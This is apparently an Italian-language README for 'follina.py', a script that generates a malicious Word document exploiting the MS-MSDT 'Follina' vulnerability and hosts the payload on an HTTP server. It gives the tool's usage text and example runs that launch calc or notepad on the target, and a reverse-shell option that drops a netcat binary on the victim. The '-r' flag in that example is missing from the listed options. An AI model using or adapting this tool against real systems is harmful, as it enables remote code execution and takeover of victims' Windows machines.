
Genera un documento Microsoft Word dannoso che sfrutta la vulnerabilità MS-MSDT 'Follina' per eseguire comandi arbitrari o mettere in scena payload tramite un server HTTP.
John Hammond | 30 maggio 2022
Crea un attacco MS-MSDT "Follina" con un documento Microsoft Word dannoso e ospita un payload con un server HTTP.

usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: calc)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
Apri calc.exe:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Apri notepad.exe:
$ python3 follina.py -c "notepad"
Ottieni una reverse shell sulla porta 9001. Nota: questo scarica un binario netcat sulla vittima e lo posiziona in C:\Windows\Tasks. Non pulisce il binario. Questo attiverà i rilevamenti antivirus a meno che l'AV non sia disabilitato.
$ python3 follina.py -r 9001
